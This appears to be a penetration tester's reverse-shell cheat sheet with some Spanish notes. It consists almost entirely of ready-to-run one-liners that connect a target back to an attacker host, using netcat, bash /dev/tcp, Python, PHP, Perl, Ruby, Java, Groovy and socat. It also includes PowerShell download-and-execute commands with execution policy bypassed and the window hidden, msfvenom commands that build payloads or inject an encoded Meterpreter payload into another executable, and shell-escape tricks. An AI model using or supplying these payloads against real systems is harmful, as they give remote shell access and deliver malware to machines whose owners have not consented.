---

ncat

• hacker:

  root@kali: nc -nlvp 666
  or
  root@kali:  rlwrap nc -nlvp 666
  

• target:

  gil@ubuntu: nc -nv 10.10.0.25 666 -e /bin/bash
  

  c:> nc.exe 192.168.100.113 4444 –e cmd.exe
  

• If you have the wrong version of netcat installed, try

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc attackerip >/tmp/f

powershell

options

• -NoP , -noprofile: No carga el windows profile
• -noni, -NonInteractive : asegura que sea no interactiva
• -Exec Bypass, -ExecutionPolicy Bypass: will not block the execution of any scripts or create any prompts
• -W Hidden: prevent powershell from displaying a window *

shells

• desde url

  con invoke-powershell modificado, agregando los datos al final del script
  shell.php?cmd=echo IEX(New-Object System.Net.WebClient).downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1') | powershell -noprofile -ep bypass
  

• desde prompt

  powershell -NoP -W Hidden -Exec Bypass -c "iex New-Object Net.WebClient).DownloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')";Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 666
  

• run 64bits powershell

  %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe
  

python

tcp

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("attackerip",443));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

udp

start listener

nc -nvlp 4445 -u

import os,pty,socket;
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM);
s.connect(("10.10.14.17",4445));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
os.putenv("HISTFILE",'/dev/null');
pty.spawn("/bin/sh");
s.close()

php

<?php exec("nohup bash -c 'bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'"); ?>

php -r '$sock=fsockopen("10.10.14.6",666);exec("/bin/bash -i <&3 >&3 2>&3");'

java reverse shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > runme.war

groovy - jenkins

String host="10.10.14.6";
int port=666;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Bash

• Method 1:

  bash -i >& /dev/tcp/10.10.14.6/4444 0>&1
  

• Method 2:

  exec 5<>/dev/tcp/IP/80
  cat <&5 | while read line; do $line 2>&5 >&5; done
  

  or:

  while read line 0<&5; do $line 2>&5 >&5; done
  

• Method 3:

  bash -c "0<&196;exec 196<>/dev/tcp/10.10.14.6/4444; sh <&196 >&196 2>&196"
  

Perl

perl -e 'use Socket;$i="10.10.14.4";$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

telnet

  rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

asp

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.168.168 LPORT=443 -f asp -o shell.asp - also works for exporting .aspx

xterm

• target

  xterm -display 10.0.0.1:1
  

• attacker

  root@kali:~# Xnest :1
  root@kali:~# xhost +targetip
  note: xserver for :1 listens on 6001
  

rundll32.exe

TODO

Regsvr32.exe

TODO

msiexec

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

c:\> msiexex \q \i http://10.10.10.1/1.msi #from url :D
c:\> msiexex \q \i 1.msi

exe

msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.100.220 LPORT=4444 -f exe -o shell.exe

injected in another binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe

socat

• kali

  socat file:`tty`,raw,echo=0 tcp-listen:4444  
  

• victim

  socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  
  

• binaries : https://github.com/andrew-d/static-binaries

  wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  
  

getting TTY

---

phineas fisher magic

• In reverse shell

  $ python -c 'import pty; pty.spawn("/bin/bash")'
  Ctrl-Z
  

• In Kali

  $ stty raw -echo
  $ fg
  

• in reverse shell

  $ reset
  $ export SHELL=bash;  export TERM=xterm-256color
  $ stty rows 38 columns 116
  

perl

perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";

or

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby

ruby: exec "/bin/sh"

irb

exec "/bin/sh"

vi

from within vi

:!bash
:set shell=/bin/bash:shell

or

vi ;/bin/bash

old nmap

nmap --interactive
nmap> !sh

expect to get tty

$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact

SSL encrypted connection

---

allow only Alice’s IP (10.0.0.4) to connect to it:

• target:

  C:\Users\offsec>ncat -‐exec  cmd.exe -‐allow   10.0.0.4	--‐vnl  4444 -‐ssl
  

• hacker:

  ncat -v 10.0.0.22 4444 --ssl